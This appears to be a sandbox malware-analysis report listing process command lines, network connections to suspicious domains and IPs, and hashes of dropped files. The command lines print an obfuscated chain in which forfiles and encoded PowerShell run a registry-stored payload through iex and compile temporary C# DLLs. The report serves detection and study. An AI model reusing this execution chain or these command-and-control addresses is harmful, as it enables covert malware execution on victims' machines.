"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82966 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82970 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:17412 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:17414 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82978 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4760 CREDAT:82982 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\forfiles.exe

forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\cmd.exe

/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ghia3nh3\ghia3nh3.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2FA4.tmp" "c:\Users\Admin\AppData\Local\Temp\ghia3nh3\CSC27BEC1645D2B4DB4B060ACD19CF88B1.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\15u10d5z\15u10d5z.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES312A.tmp" "c:\Users\Admin\AppData\Local\Temp\15u10d5z\CSCF125F687492A430B9A63A17B8B80657.TMP"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4104 -ip 4104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 684

Network

Country Destination Domain Proto
US 8.8.8.8:53 gogojoob.xyz udp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 104.110.191.133:80 tcp
US 93.184.221.240:80 tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
IL 185.241.5.229:443 tcp
US 199.249.230.83:80 199.249.230.83 tcp
RU 213.183.56.140:8080 213.183.56.140 tcp
US 209.141.45.189:80 209.141.45.189 tcp
US 199.249.230.82:80 199.249.230.82 tcp
VN 125.212.217.197:80 125.212.217.197 tcp
US 199.249.230.83:80 199.249.230.83 tcp
US 199.249.230.82:80 199.249.230.82 tcp
US 209.141.45.189:80 209.141.45.189 tcp
MY 124.217.246.99:80 124.217.246.99 tcp
SE 193.189.100.201:80 193.189.100.201 tcp
JP 172.104.79.222:80 172.104.79.222 tcp
JP 61.197.58.147:80 61.197.58.147 tcp
US 199.249.230.117:80 199.249.230.117 tcp
IS 82.221.131.5:80 tcp
US 8.8.8.8:53 unavas.xyz udp
US 8.8.8.8:53 microsoft.com udp
NL 91.242.229.120:443 unavas.xyz tcp
US 38.147.122.253:80 38.147.122.253 tcp
LU 107.189.10.237:80 107.189.10.237 tcp
AT 86.59.21.38:80 86.59.21.38 tcp
US 199.249.230.149:80 199.249.230.149 tcp
HK 91.245.255.39:80 91.245.255.39 tcp
US 199.249.230.176:80 199.249.230.176 tcp
US 199.249.230.151:80 199.249.230.151 tcp
US 172.104.208.190:80 172.104.208.190 tcp
EG 41.77.137.114:80 41.77.137.114 tcp
FR 51.15.249.81:80 tcp
US 199.249.230.176:80 tcp
US 8.8.8.8:53 curlmyip.net udp
FI 135.181.84.242:80 curlmyip.net tcp
NL 91.242.229.120:443 unavas.xyz tcp
US 8.8.8.8:53 api.msn.com udp
US 204.79.197.203:443 api.msn.com tcp

Files

memory/4104-134-0x000000000042E000-0x000000000043A000-memory.dmp

memory/4104-135-0x000000000042E000-0x000000000043A000-memory.dmp

memory/4104-136-0x00000000005B0000-0x00000000005BC000-memory.dmp

memory/4104-137-0x0000000001000000-0x000000000106F000-memory.dmp

memory/4104-138-0x0000000000D30000-0x0000000000D40000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\2psodd8\imagestore.dat

MD5 06cc70d0cfe0ddc293afb580402104e3
SHA1 a0b28ea12c39b2d0b1a45aeaf81f4bcee851b3db
SHA256 56fdf8ee0e5aa100d91e6d2bbd0c4d2e9a8265e130f474fdf7b41cc8640a39c1
SHA512 62988ebadb3b88d4bec0a3b4086ecd0b5ff5f76f894978f972b1b4b0996dea2b0b7e33a9244c6abf1acfa4c99d3a9534b29c7f206d3e5157f91a77f0a4a3c22a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 6433da6e116e23f2c4388dbc6893ba6c
SHA1 fcdb3be2a097789a35caef8f27cd7493e29fb396
SHA256 56227dccdbfa7c45e927438f5f5754b60ed0bdc368d8285c4740753a31305985
SHA512 d3c1774d78446a1389d502f6c84ca386be3ff8e68aa24a6a29488a3e7675a810a416c9820843045adc7b200a9612d42cfb739682233ae4e95ca611a47050d05a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 54e9306f95f32e50ccd58af19753d929
SHA1 eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA256 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA512 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GGB3KH7Z\favicon[2].ico

MD5 a976d227e5d1dcf62f5f7e623211dd1b
SHA1 a2a9dc1abdd3d888484678663928cb024c359ee6
SHA256 66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271
SHA512 6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f

memory/4624-148-0x0000023D2A4D0000-0x0000023D2A4F2000-memory.dmp

memory/4624-149-0x0000023D11640000-0x0000023D12101000-memory.dmp

memory/4624-151-0x0000023D2A5A0000-0x0000023D2A5A2000-memory.dmp

memory/3716-150-0x000001EA1DD30000-0x000001EA1E7F1000-memory.dmp

memory/4624-153-0x0000023D2A5A6000-0x0000023D2A5A8000-memory.dmp

memory/3716-155-0x000001EA1BE33000-0x000001EA1BE35000-memory.dmp

memory/3716-154-0x000001EA1BE30000-0x000001EA1BE32000-memory.dmp

memory/4624-152-0x0000023D2A5A3000-0x0000023D2A5A5000-memory.dmp

memory/3716-156-0x000001EA1BE36000-0x000001EA1BE38000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a6c9d692ed2826ecb12c09356e69cc09
SHA1 def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256 a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA512 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

memory/228-159-0x0000024E2ABD0000-0x0000024E2B691000-memory.dmp

memory/228-160-0x0000024E2B6A0000-0x0000024E2B75D000-memory.dmp

memory/228-161-0x0000024E2B6A0000-0x0000024E2B75D000-memory.dmp

memory/228-162-0x0000024E2B6A0000-0x0000024E2B75D000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\ghia3nh3\ghia3nh3.cmdline

MD5 f482e58085e5a042c0f7e6b4df01406f
SHA1 aa11735f9ae740c6d46bcf58534dc0ab69fa415c
SHA256 f55fbb36261bf5e25b4d390f31a5c27d383772c2e94b30482fb579f08b500a61
SHA512 3191bae0b1f390ef29d69196d73bfb92713599f389d87cc284b856a27e6ac176bf59c5509da6f08e25be5a82f680630eaaaf0fcf64dc1aa8626d3aff4e7ae953

\??\c:\Users\Admin\AppData\Local\Temp\ghia3nh3\ghia3nh3.0.cs

MD5 7fceb996f934e8bda687cdd2bd46a9a7
SHA1 81e1edbcca6438daaccc3845fa0e3b1a6cff17a6
SHA256 fa53f8174510a9ad008973d47798f022b681e1764a15134efd2004980f23bb6e
SHA512 6aa6253527b72c0605859180887ff19cd96412cb816ec02e832d4a0e0cbcd03d9cc580112e4e2055d4a9ede850c1a339df974371f992b0b9b73e54e137610205

\??\c:\Users\Admin\AppData\Local\Temp\ghia3nh3\CSC27BEC1645D2B4DB4B060ACD19CF88B1.TMP

MD5 5681486182205dbfa2f7e4efae349e53
SHA1 e023b20452744323d5730e7df6347bd492bbceb8
SHA256 bc643365bd00647890e34534d3e91f05f891a4e870c6ed9606df8ba29c2396a1
SHA512 599713f5052968785cb36f8b245c2f1cd94f91422b96cd845152c98fd2cb0a22c1d9de20d4410ab2f80096c6f5270e1ffb0a4e26b961ad025f14d906b9250c3e

C:\Users\Admin\AppData\Local\Temp\RES2FA4.tmp

MD5 28ad96b363c407deccbc2accde3005a1
SHA1 e44402e1a888c864697e2aaaad77403e1ed8faa0
SHA256 6bbabc629b56271ea17b81655be5a6797d1fac265004887002e0998542702be8
SHA512 cada852fe6b6cd66e3fa8fbad6b6a393cf0a2e73a0d9b3b8c280cb3c33e9723334c483af3800a3a21d77a185bb5e54e4230071fc4f3636b6eb04d09f77a31eaa

C:\Users\Admin\AppData\Local\Temp\ghia3nh3\ghia3nh3.dll

MD5 ab820512bcc23272f20e3e6acbb6a109
SHA1 3a4df0c01dabc15c513396ec0e249f6028a6dfef
SHA256 07ab18ec29ddef7ae4819ecc20a5e3a2cf07e2d5342b88ea332bca9b650af6e3
SHA512 f4b1bb948100f1cb60c0ef344b1de82864ffeb8592d8e201964c0f351277102e7b41cbdbce561d812a1d32108b4d1abfd3d4daeec994679deedb5a4504eeef1c

\??\c:\Users\Admin\AppData\Local\Temp\15u10d5z\15u10d5z.cmdline

MD5 f8ae56a095376eb80a636d564308422f
SHA1 6086a5df68ba0469ec689cdd2bebd0583605c861
SHA256 fcad36328c8120d1499b691218f4648e04620f689dd9dd68c1bf30bea004e156
SHA512 2595a8c41bc692779d9d658e30ca22aa6ead8c4c3d34b68c9eb7e1d0478f4f2880af4aed745a393b2e60faa1bf391f48437f3dc63ef96982c7b546cdd1c72a89

\??\c:\Users\Admin\AppData\Local\Temp\15u10d5z\15u10d5z.0.cs

MD5 697f16b8c6892082559d8a17db343865
SHA1 246d6ba1419478be7915e78b61525da894321fb9
SHA256 518ab091348dea4f49183958185b3d42b5ddb191007bab25b6e69ff6ec923f1f
SHA512 801a428c5dd5ff4a745923914505dcf5a9929b3dbfc5bb5f6320996ad849fa42dc75ac53a432dd01103e0d6db2269583351f14b189a76a066d6f940ff79d38d6

\??\c:\Users\Admin\AppData\Local\Temp\15u10d5z\CSCF125F687492A430B9A63A17B8B80657.TMP

MD5 ccd592f6efece8859db195c81f852a00
SHA1 ba5d05bf1149d7efbb7246434a68a17aafa98920
SHA256 3d65fdbbd64f8acdef43152eb270252e61c968064e42e5920dc49e7cf6ea5772
SHA512 1f9f7ceaca8429b16f5eedcca43e3c69204e5c53c4af50e819ac6beef9964f9ed162f38b7c75bd955b4f696f60f3356f6a6606d3a62ddbef93406e21c1449a0a

C:\Users\Admin\AppData\Local\Temp\RES312A.tmp

MD5 83ab356e22e539208e002146438cc00f
SHA1 700b19780616385c7b44c544ee3028dc5c435c30
SHA256 ea0fd02c5ae345916969ae7bf2b98ee39977ce634dff92a31a338d56bf350550
SHA512 72d5fbae9c84943959394a83dc325b49a54571808d5241784738c979d8b6a6602e80a92a3890ed558a76d66fc59c08460a79e3fceb79952c8bab8e4eea7643d9

C:\Users\Admin\AppData\Local\Temp\15u10d5z\15u10d5z.dll

MD5 116861649741ab5ee8953c95836aa55f
SHA1 c299529e1007f6f720196e447ae065244578cf28
SHA256 843dad148fdf4eb0e238b3da0c77c43a321c60db3bc0a497b27ae0dd1bc9f8d9
SHA512 29ed2eff6d0e6f9eddc94619e83e69f2eef103b34fead7fe57e63f1979f8108a8f0fc7ccd02c104e25020364fc41114f9c9b5cc52e542934f0aaa5134994e3c6

memory/4624-173-0x0000023D2A560000-0x0000023D2A573000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 56eed407989b43f7fc53e2e7a47ab967
SHA1 a5c6b2f493199a08fabee50e6d588773952148f0
SHA256 efee8d1f6796868b832708e0b20a86e65736958419f2f7bbc97eb5d93346c6d3
SHA512 c15dfa9eb19eb2f7859043956f68f231c173c752409150f76fc0555cec11faf77aca175207ece0cad37767d72bd92af1969aba39f7be7c8df2fe0521bb426e64

memory/4104-175-0x00000000001C0000-0x00000000001CE000-memory.dmp

memory/2996-176-0x00000000015B0000-0x00000000015C5000-memory.dmp

memory/2996-177-0x0000000001590000-0x00000000015A5000-memory.dmp